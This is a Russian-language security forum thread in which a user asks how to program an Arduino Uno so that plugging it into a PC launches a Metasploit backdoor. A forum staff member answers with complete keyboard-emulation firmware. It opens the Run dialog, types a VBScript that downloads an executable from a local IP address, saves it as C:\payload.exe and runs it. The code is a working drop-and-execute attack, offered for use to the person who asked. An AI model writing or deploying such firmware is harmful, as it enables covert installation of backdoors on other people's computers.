• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

как в arduino uno прошить так что бы при подключении запускался msf

Matthew Tsyb

Active member
07.04.2020
27
0
BIT
0
Как прошить в arduino uno backdoor который при подключении к пк запускал метасплоит созданный через MSFVenom
 
Решение
Можешь пожалуйста скинуть прошивку которую надо загрузить на arduino uno
Вы бы потрудились хотя бы прочесть то, что я вам отправил:
на ардуинку загружается не бэкдор, а скрипт, который сэмулирует запуск скачивания бекдора.

Этот backdoor должен быть собран, загружен и лежать где-то либо в локальной сети, либо в интернете.
Уместить его в память ардуино не представляется возможным.


Ну а прошивка - вот она:
C++:
int ledPin = 11; //номер пина, на который уже разведен светодиод
int complete_flag =0; //флаг, указывающий, что один цикл программы уже выполнился


void setup() {
    pinMode(ledPin, OUTPUT);
    for(int i=0;i<=2;i++)
    {
        delay(1000);
        digitalWrite(ledPin,HIGH);
        delay(1000)...

f22

Codeby Academy
Gold Team
05.05.2019
1 844
225
BIT
1 121
Можешь пожалуйста скинуть прошивку которую надо загрузить на arduino uno
Вы бы потрудились хотя бы прочесть то, что я вам отправил:
на ардуинку загружается не бэкдор, а скрипт, который сэмулирует запуск скачивания бекдора.

Этот backdoor должен быть собран, загружен и лежать где-то либо в локальной сети, либо в интернете.
Уместить его в память ардуино не представляется возможным.


Ну а прошивка - вот она:
C++:
int ledPin = 11; //номер пина, на который уже разведен светодиод
int complete_flag =0; //флаг, указывающий, что один цикл программы уже выполнился


void setup() {
    pinMode(ledPin, OUTPUT);
    for(int i=0;i<=2;i++)
    {
        delay(1000);
        digitalWrite(ledPin,HIGH);
        delay(1000);
        digitalWrite(ledPin,LOW);
    }
}



void loop() {
    if(!complete_flag)
    {
        Keyboard.set_modifier(MODIFIERKEY_LEFT_GUI);
        Keyboard.set_key1(KEY_R);
        Keyboard.send_now();
        Keyboard.set_modifier(0);
        Keyboard.set_key1(0);
        Keyboard.send_now();

        delay(1000);

        Keyboard.println("notepad");
        delay(1000);

        Keyboard.println("Set xml=CreateObject(\"Microsoft.XMLHTTP\")");
        // Вместо http://192.168.1.137/calc должен лежать путь к вашему бэкдору
        Keyboard.println("xml.Open \"GET\",\"http://192.168.1.137/calc.\"&\"exe\",False");
        Keyboard.println("xml.Send");
        Keyboard.println("set oStream=createobject(\"Adodb.Stream\")");
        Keyboard.println("Const adTypeBinary=1");
        Keyboard.println("Const adSaveCreateOverWrite=2");
        Keyboard.println("Const adSaveCreateNotExist=1 ");
        Keyboard.println("oStream.type=1");
        Keyboard.println("oStream.open");
        Keyboard.println("oStream.write xml.responseBody");
        Keyboard.println("oStream.savetofile \"C:\\payload.\"&\"exe\", 2");
        Keyboard.println("oStream.close");
        Keyboard.println("Set wshShell=CreateObject(\"WScript.Shell\")");
        Keyboard.println("WshShell.Exec (\"C:\\payload.\"&\"exe\")");

        Keyboard.set_modifier(MODIFIERKEY_LEFT_ALT);
        Keyboard.set_key1(KEY_F4);
        Keyboard.send_now();
        Keyboard.set_modifier(0);
        Keyboard.set_key1(0);
        Keyboard.send_now();
        delay(1000);
        Keyboard.println("");
        delay(1000);
        Keyboard.println("c:\\getpayload.vbs");


        Keyboard.set_modifier(MODIFIERKEY_LEFT_GUI);
        Keyboard.set_key1(KEY_R);
        Keyboard.send_now();
        Keyboard.set_modifier(0);
        Keyboard.set_key1(0);
        Keyboard.send_now();
        delay(1000);
        Keyboard.println("c:\\getpayload.vbs");
        complete_flag = 1;
    }
}
 
Решение

Matthew Tsyb

Active member
07.04.2020
27
0
BIT
0
Вы бы потрудились хотя бы прочесть то, что я вам отправил:
на ардуинку загружается не бэкдор, а скрипт, который сэмулирует запуск скачивания бекдора.

Этот backdoor должен быть собран, загружен и лежать где-то либо в локальной сети, либо в интернете.
Уместить его в память ардуино не представляется возможным.

Понял спасибо большое
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!